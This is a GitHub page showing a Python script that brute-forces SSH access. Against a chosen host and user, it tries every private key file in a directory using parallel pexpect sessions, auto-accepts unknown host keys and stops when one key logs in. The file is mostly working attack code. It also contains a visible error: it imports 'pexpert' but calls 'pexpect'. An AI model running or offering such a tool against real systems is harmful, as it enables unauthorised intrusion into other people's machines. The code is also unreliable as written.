-
Notifications
You must be signed in to change notification settings - Fork 92
/
Copy pathssh4.py
64 lines (59 loc) · 2.22 KB
/
ssh4.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# coding=UTF-8
import pexpert
import optparse
import os
import threading
maxConnections = 5
connection_lock = threading.BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop, Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
if ret == 2:
print('[-] Adding Host to ∼/.ssh/known_hosts')
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print('[-] Connection Closed By Remote Host')
Fails += 1
elif ret > 3:
print('[+] Success. ' + str(keyfile))
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog -H <target host> -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-d', dest='passDir', type='string', help='specify directory with keys')
parser.add_option('-u', dest='user', type='string', help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user = options.user
if host == None or passDir == None or user == None:
print(parser.usage)
exit(0)
for filename in os.listdir(passDir):
if Stop:
print('[*] Exiting: Key Found.')
exit(0)
if Fails > 5:
print('[!] Exiting: Too Many Connections Closed By Remote Host.')
print('[!] Adjust number of simultaneous threads.')
exit(0)
connection_lock.acquire()
fullpath = os.path.join(passDir, filename)
print('[-] Testing keyfile ' + str(fullpath))
t = threading.Thread(target=connect, args=(user, host, fullpath, True))
t.start()
if __name__ == '__main__':
main()